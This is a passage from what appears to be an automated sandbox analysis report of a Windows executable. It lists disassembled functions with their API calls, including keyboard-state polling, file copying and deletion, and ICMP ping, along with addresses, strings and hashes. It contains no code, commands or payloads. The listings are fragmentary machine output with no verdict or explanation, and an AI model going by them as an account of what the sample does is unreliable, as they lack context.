                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                              • String ID: BUTTON
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004FC6A0: __time64.LIBCMT ref: 004FC6AA
                                                                                                                                                                                • Part of subcall function 004B41A7: _fseek.LIBCMT ref: 004B41BF
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004FC96F
                                                                                                                                                                                • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004FC982
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004FC995
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004FC9BA
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004FC9D0
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004FC9E3
                                                                                                                                                                                • Part of subcall function 004FC6E4: _memmove.LIBCMT ref: 004FC71D
                                                                                                                                                                                • Part of subcall function 004FC6E4: _memmove.LIBCMT ref: 004FC72C
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004FC92A
                                                                                                                                                                                • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF49
                                                                                                                                                                                • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF5C
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004FCB8D
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004FCC24
                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004FCC3A
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004FCC4B
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004FCC5D
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 004F3908
                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 004F3973
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 004F3993
                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 004F39AA
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 004F39D9
                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 004F39EA
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 004F3A16
                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 004F3A24
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 004F3A4D
                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 004F3A5B
                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 004F3A84
                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 004F3A92
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004EFB19
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004EFB2B
                                                                                                                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004EFB89
                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 004EFB94
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004EFBA6
                                                                                                                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004EFBFC
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004EFC0A
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004EFC1B
                                                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004EFC5E
                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004EFC6C
                                                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004EFC89
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004EFC96
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3096461208-0
                                                                                                                                                                              • Opcode ID: cb3702b4e1e23dfc10fcc0054e52cb3f5fe3029e810c0956d9e074368577ecdd
                                                                                                                                                                              • Instruction ID: 0db81d06687c26c77b77ecdddff34344052e1c4448b95530b0f52fd2e61cf004
                                                                                                                                                                              • Opcode Fuzzy Hash: cb3702b4e1e23dfc10fcc0054e52cb3f5fe3029e810c0956d9e074368577ecdd
                                                                                                                                                                              • Instruction Fuzzy Hash: 10512071B00209AFDB18CFA9DD95AAEBBBAFB98311F148139F915D7390D774AD048B10
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004B4954,00000000), ref: 004B4A23
                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004CB85B), ref: 004CB926
                                                                                                                                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 004CB9BD
                                                                                                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0052E775
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 0052E7A6
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 0052E7BD
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 0052E7D9
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0052E7EB
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 641708696-0
                                                                                                                                                                              • Opcode ID: 2806a548d177e263b41412a93895b7c1a89c6533f3120f1de2d456711f07c627
                                                                                                                                                                              • Instruction ID: d4bc06c2d4a2a3d0343bac10733a35e481fb55506950eedb204b6823dfe9ab72
                                                                                                                                                                              • Opcode Fuzzy Hash: 2806a548d177e263b41412a93895b7c1a89c6533f3120f1de2d456711f07c627
                                                                                                                                                                              • Instruction Fuzzy Hash: 4C61E134100B11CFDB259F19E88AB26BBF1FF65311F14011EE19A466B0C734A885EF9A
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 004CB067
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ColorLongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 259745315-0
                                                                                                                                                                              • Opcode ID: e9f6d4d94cf304310b4bf41b1cf219e3896c9295394e3fe3fc9ee3c7ff3b4bac
                                                                                                                                                                              • Instruction ID: eaa5b44f36f1cba96a390e08220059d60359399adb7449af57764d10bc6f36cd
                                                                                                                                                                              • Opcode Fuzzy Hash: e9f6d4d94cf304310b4bf41b1cf219e3896c9295394e3fe3fc9ee3c7ff3b4bac
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B41C3351005109FDB205F39E84AFBA3B75EB16721F18426AFD758A2E1C7348C45EBA6
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 136442275-0
                                                                                                                                                                              • Opcode ID: 156b3f7c6e23dfb8567dc48f29857763a306993c2a9cd9472b483822ee660ae8
                                                                                                                                                                              • Instruction ID: c6743a9a7ef636430402261006fe447bbf78b804ca8b8ab157c459c79ac176cc
                                                                                                                                                                              • Opcode Fuzzy Hash: 156b3f7c6e23dfb8567dc48f29857763a306993c2a9cd9472b483822ee660ae8
                                                                                                                                                                              • Instruction Fuzzy Hash: 5341F2B290411C6ADB21EB51CC65EEE73BCAB08314F1041E7F619A2151EB799BD4CF68
                                                                                                                                                                              APIs
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                              • __itow.LIBCMT ref: 004B8519
                                                                                                                                                                                • Part of subcall function 004D2177: _xtow@16.LIBCMT ref: 004D2198
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __itow__swprintf_xtow@16
                                                                                                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                                                                                                              • API String ID: 1502193981-2263619337
                                                                                                                                                                              • Opcode ID: b640abc092135b69677571584c8439feb6ee40991bc9588f20f92b55fb566d37
                                                                                                                                                                              • Instruction ID: 701713eaa0ceb53b064aaefb6251a15d2c65dd492437dda5f3858a22fa01c13e
                                                                                                                                                                              • Opcode Fuzzy Hash: b640abc092135b69677571584c8439feb6ee40991bc9588f20f92b55fb566d37
                                                                                                                                                                              • Instruction Fuzzy Hash: 0B412931600605EBDB24DF34D841FAA7BE9BF44314F20485FE449C7291FA399A42CB25
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004D5CCA
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              • __gmtime64_s.LIBCMT ref: 004D5D63
                                                                                                                                                                              • __gmtime64_s.LIBCMT ref: 004D5D99
                                                                                                                                                                              • __gmtime64_s.LIBCMT ref: 004D5DB6
                                                                                                                                                                              • __allrem.LIBCMT ref: 004D5E0C
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E28
                                                                                                                                                                              • __allrem.LIBCMT ref: 004D5E3F
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E5D
                                                                                                                                                                              • __allrem.LIBCMT ref: 004D5E74
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E92
                                                                                                                                                                              • __invoke_watson.LIBCMT ref: 004D5F03
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 384356119-0
                                                                                                                                                                              • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                                                                              • Instruction ID: 8d964334dc49b26038b8e4b356881d5f883f09bd2c2a1d87b6f70490f31f3736
                                                                                                                                                                              • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                                                                              • Instruction Fuzzy Hash: 5E71F771A01B16ABD714AF6ACC51B6BB3A9AF00725F14422FF514D7781EF78DE008B98
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004F5816
                                                                                                                                                                              • GetMenuItemInfoW.USER32(005718F0,000000FF,00000000,00000030), ref: 004F5877
                                                                                                                                                                              • SetMenuItemInfoW.USER32(005718F0,00000004,00000000,00000030), ref: 004F58AD
                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 004F58BF
                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 004F5903
                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 004F591F
                                                                                                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 004F5949
                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 004F598E
                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004F59D4
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F59E8
                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F5A09
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4176008265-0
                                                                                                                                                                              • Opcode ID: bce81fa997dafe5c6eb178f4d0ad1ff19ef994ff0726b9f611f98a61873cb171
                                                                                                                                                                              • Instruction ID: 7bf4fdf52f2cd79fe68ca1e13faf41f55f72e5e153ec0ef69dcdeb245ed3372d
                                                                                                                                                                              • Opcode Fuzzy Hash: bce81fa997dafe5c6eb178f4d0ad1ff19ef994ff0726b9f611f98a61873cb171
                                                                                                                                                                              • Instruction Fuzzy Hash: D361CBB0900A4DEFDB15DFA8E888EBF7BB8EB01358F14011AE741A3251D378AD05DB25
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00519AA5
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00519AA8
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00519ACC
                                                                                                                                                                              • _memset.LIBCMT ref: 00519ADD
                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00519AEF
                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00519B67
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 830647256-0
                                                                                                                                                                              • Opcode ID: 83fd3b7805092c7d06e715e1ff3e65d639c5877f61e0a5c62490d0eb53f888dc
                                                                                                                                                                              • Instruction ID: eb5e0bc2654097eb24a2463f80d9a5246f4f946d508486f2198cb6e92fe75f1a
                                                                                                                                                                              • Opcode Fuzzy Hash: 83fd3b7805092c7d06e715e1ff3e65d639c5877f61e0a5c62490d0eb53f888dc
                                                                                                                                                                              • Instruction Fuzzy Hash: AE618B75900208AFEB10DFA8DC91EEE7BF8BF09304F144159FA19A7291C770AD85DBA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 004F3591
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 004F3612
                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 004F362D
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 004F3647
                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 004F365C
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 004F3674
                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 004F3686
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 004F369E
                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 004F36B0
                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 004F36C8
                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 004F36DA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                              • Opcode ID: 656be838c1ff77c1202a2416320810cee88780d371bcfff13bdcb3868a847068
                                                                                                                                                                              • Instruction ID: 59d00228232c2e2f2dcd307098812ff5ae44e0636184fd5d87f519caba71cf81
                                                                                                                                                                              • Opcode Fuzzy Hash: 656be838c1ff77c1202a2416320810cee88780d371bcfff13bdcb3868a847068
                                                                                                                                                                              • Instruction Fuzzy Hash: 114172705047CD7DFF315E6494143B7BAB06B2134AF04405BD7C6863C2EBA89BC8876A
                                                                                                                                                                              APIs
                                                                                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004EA2AA
                                                                                                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 004EA2F5
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004EA307
                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004EA327
                                                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 004EA36A
                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004EA37E
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004EA393
                                                                                                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 004EA3A0
                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EA3A9
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004EA3BB
                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EA3C6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2706829360-0
                                                                                                                                                                              • Opcode ID: 91e8b7626e5df8e6047221bfdf6f7defda39553f371f3190bd990c02783e51ba
                                                                                                                                                                              • Instruction ID: c0ff3831ecb9ce5648a64b3ad897cc25d35aaf8027218990980fdac2ebe2ea60
                                                                                                                                                                              • Opcode Fuzzy Hash: 91e8b7626e5df8e6047221bfdf6f7defda39553f371f3190bd990c02783e51ba
                                                                                                                                                                              • Instruction Fuzzy Hash: AF414D31900219AFCF01DFA5D8849DEBFB9FF08345F00806AF901A7251DB74AA59DBA5
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • CoInitialize.OLE32 ref: 0050B298
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0050B2A3
                                                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0053D8FC,?), ref: 0050B303
                                                                                                                                                                              • IIDFromString.OLE32(?,?), ref: 0050B376
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0050B410
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0050B471
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                              • API String ID: 834269672-1287834457
                                                                                                                                                                              • Opcode ID: 48f2a6ee085c431ddee1ceca2ef4157deb703b160c04b7e1323dce5a35bc2597
                                                                                                                                                                              • Instruction ID: 18f173c7f03f3a59dbc1f0b468f76d1648b878fa85cd033332fe6913687def26
                                                                                                                                                                              • Opcode Fuzzy Hash: 48f2a6ee085c431ddee1ceca2ef4157deb703b160c04b7e1323dce5a35bc2597
                                                                                                                                                                              • Instruction Fuzzy Hash: 5F61AC70204701AFE710DF55C889BAEBBE8BF88714F14481EF9859B291D770EE48CB96
                                                                                                                                                                              APIs
                                                                                                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 005086F5
                                                                                                                                                                              • inet_addr.WSOCK32(?,?,?), ref: 0050873A
                                                                                                                                                                              • gethostbyname.WSOCK32(?), ref: 00508746
                                                                                                                                                                              • IcmpCreateFile.IPHLPAPI ref: 00508754
                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005087C4
                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005087DA
                                                                                                                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0050884F
                                                                                                                                                                              • WSACleanup.WSOCK32 ref: 00508855
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                              • String ID: Ping
                                                                                                                                                                              • API String ID: 1028309954-2246546115
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 00519C68
                                                                                                                                                                              • CreateMenu.USER32 ref: 00519C83
                                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00519C92
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00519D1F
                                                                                                                                                                              • IsMenu.USER32(?), ref: 00519D35
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00519D3F
                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00519D70
                                                                                                                                                                              • DrawMenuBar.USER32 ref: 00519D7E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 176399719-4108050209
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 004FEC1E
                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004FEC94
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004FEC9E
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 004FED0B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
